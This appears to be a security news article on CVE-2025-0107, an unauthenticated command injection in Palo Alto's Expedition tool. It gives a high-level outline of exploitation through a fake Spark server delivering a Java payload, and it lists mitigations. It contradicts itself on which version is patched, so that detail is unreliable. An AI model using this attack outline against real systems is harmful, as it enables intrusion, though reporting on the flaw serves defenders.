PoC Exploit Released for Palo Alto Expedition Tool OS Command Injection Vulnerability

A recently disclosed vulnerability in Palo Alto Networks’ Expedition tool has raised significant security concerns, as a proof-of-concept (PoC) exploit has been released for CVE-2025-0107.

This OS command injection vulnerability allows remote attackers to execute arbitrary code on affected systems, posing a severe risk to organizations utilizing the tool.

The flaw, identified as CVE-2025-0107, resides in the /API/regionsDiscovery.php endpoint of the Expedition tool. Exploitation of this vulnerability requires no authentication and enables attackers to trigger a connection to an attacker-controlled Apache Spark server.

The malicious server can then deliver a Java package that is executed by the Expedition server, leading to arbitrary code execution. This vulnerability impacts versions 1.2.101 and earlier of the tool.

The Expedition tool, designed to assist in migrating configurations from third-party firewalls to Palo Alto’s Next-Generation Firewall (NGFW) platform, reached its end-of-life (EoL) on December 31, 2024.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Despite its EoL status, many organizations may still rely on it for critical migration tasks, increasing the urgency of addressing this issue.

Palo Alto Expedition Tool OS Command Injection Vulnerability

The vulnerability exploits insufficient input sanitization in the affected endpoint. By crafting a malicious request with specific parameters, attackers can manipulate the tool into executing commands on the underlying operating system. The exploit involves:

1. Sending a request to the vulnerable endpoint with parameters pointing to a fake Apache Spark server.
2. The attacker-controlled server responds with a malicious Java payload.
3. The payload is executed by the Expedition server, granting attackers control over the system.

Security researchers have released a PoC exploit demonstrating how attackers can leverage this vulnerability. The PoC includes Python scripts that simulate both the attack and the fake Spark server used to deliver malicious payloads.

Palo Alto Networks has released patches addressing this issue in Expedition version 1.2.101 and later. Users are strongly urged to upgrade their systems immediately and restrict network access to authorized users only.

Mitigation Recommendations

To protect against potential exploitation:

• Upgrade to Expedition version 1.2.101 or later.
• Restrict access to the Expedition tool’s interface to trusted networks.
• Disable unused instances of Expedition if no longer required.
• Rotate all credentials processed through the tool as a precautionary measure.

The release of a PoC exploit significantly increases the likelihood of attacks targeting this vulnerability. Organizations using outdated versions of the Expedition tool must act swiftly to patch their systems and mitigate risks.

While Palo Alto Networks has retired Expedition, its use in migration processes underscores the importance of securing temporary tools handling sensitive data.

Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar